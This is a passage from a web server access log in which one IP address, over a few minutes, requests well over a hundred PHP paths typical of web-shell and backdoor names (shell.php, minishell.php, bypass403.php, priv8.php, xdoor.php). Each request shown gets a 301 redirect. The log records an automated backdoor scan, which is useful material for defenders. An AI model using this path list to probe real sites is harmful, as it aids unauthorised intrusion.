/wp-file.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:18:33 +0700] "GET /user.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:18:35 +0700] "GET /content.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:18:36 +0700] "GET /up.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:18:38 +0700] "GET /upgrade.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:18:40 +0700] "GET /wg.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:18:42 +0700] "GET /antiheker.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:18:43 +0700] "GET /wp-contact.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:18:45 +0700] "GET /ws.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:18:46 +0700] "GET /pler.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:18:48 +0700] "GET /memek.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:18:49 +0700] "GET /kontol.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:18:52 +0700] "GET /gecko.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:18:54 +0700] "GET /css.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:18:58 +0700] "GET /js.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:18:59 +0700] "GET /bypass403.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:19:01 +0700] "GET /bypass.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:19:04 +0700] "GET /adm.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:19:06 +0700] "GET /abc.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:19:08 +0700] "GET /wp-aespa.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:19:10 +0700] "GET /priv8.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:19:13 +0700] "GET /symlink.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:19:14 +0700] "GET /sym.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:19:17 +0700] "GET /wp-login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:19:20 +0700] "GET /1313.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:19:23 +0700] "GET /shell.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:19:25 +0700] "GET /info.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:19:26 +0700] "GET /cyl.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:19:27 +0700] "GET /r00t.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:19:28 +0700] "GET /idx.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:19:30 +0700] "GET /Idx.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:19:32 +0700] "GET /mari.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:19:33 +0700] "GET /123.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:19:34 +0700] "GET /mini.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:19:36 +0700] "GET /minishell.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:19:38 +0700] "GET /init.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:19:41 +0700] "GET /wp-2019.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:19:44 +0700] "GET /wp-2018.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:19:45 +0700] "GET /wp-2017.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:19:47 +0700] "GET /style-js.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:19:48 +0700] "GET /login.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:19:50 +0700] "GET /remove.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:19:52 +0700] "GET /obfbyte.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:19:54 +0700] "GET /zzz.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:19:56 +0700] "GET /1337.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:20:00 +0700] "GET /error.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:20:04 +0700] "GET /anonsec.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:20:07 +0700] "GET /anon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:20:08 +0700] "GET /licenses.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:20:11 +0700] "GET /bps.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:20:13 +0700] "GET /library.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:20:14 +0700] "GET /wp-root.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:20:17 +0700] "GET /wp-.myluv.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:20:20 +0700] "GET /wp-users.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:20:23 +0700] "GET /wp-menu.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:20:27 +0700] "GET /88.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:20:28 +0700] "GET /bypass404.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:20:30 +0700] "GET /back.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:20:31 +0700] "GET /priv01.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:20:33 +0700] "GET /meki.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:20:35 +0700] "GET /gecko-new.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:20:37 +0700] "GET /help.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:20:39 +0700] "GET /file.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:20:40 +0700] "GET /303.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:20:43 +0700] "GET /sample-config-options.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:20:45 +0700] "GET /wp-config-samsples.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:20:46 +0700] "GET /ye.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:20:49 +0700] "GET /clay.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:20:51 +0700] "GET /forbiden.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:20:52 +0700] "GET /class-wp.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:20:54 +0700] "GET /curme.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:20:56 +0700] "GET /xdoor.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:20:58 +0700] "GET /joy.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:20:59 +0700] "GET /ri.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:21:01 +0700] "GET /cd.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:21:02 +0700] "GET /on-settingssl.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:21:09 +0700] "GET /root.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:21:15 +0700] "GET /db.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:21:18 +0700] "GET /wp-del.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:21:19 +0700] "GET /goods.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:21:23 +0700] "GET /makesmtp.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:21:26 +0700] "GET /product.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:21:28 +0700] "GET /stylec.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:21:30 +0700] "GET /ticket.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:21:32 +0700] "GET /4.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:21:32 +0700] "GET /2.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:21:34 +0700] "GET /3.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:21:35 +0700] "GET /401.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:21:39 +0700] "GET /405.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:21:41 +0700] "GET /shl.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:21:42 +0700] "GET /scn.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:21:45 +0700] "GET /lowpr.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:21:46 +0700] "GET /63ck0.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:21:49 +0700] "GET /pda.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:21:54 +0700] "GET /danci.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:21:55 +0700] "GET /fse.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:21:57 +0700] "GET /anonym.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:21:59 +0700] "GET /lock.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:22:01 +0700] "GET /demos.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:22:05 +0700] "GET /demon.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:22:07 +0700] "GET /tesla.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:22:11 +0700] "GET /clan.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:22:13 +0700] "GET /Fdbxhriw.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:22:14 +0700] "GET /kontoru.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:22:15 +0700] "GET /1111.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:22:17 +0700] "GET /shell4.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:22:18 +0700] "GET /lyda.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:22:20 +0700] "GET /ids.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:22:24 +0700] "GET /Priv.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:22:27 +0700] "GET /bb.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:22:30 +0700] "GET /bbb.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:22:31 +0700] "GET /zz.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:22:33 +0700] "GET /database.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - [12/Sep/2024:04:22:35 +0700] "GET /dr.php HTTP/1.1" 301 162 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 104.248.174.117 - - 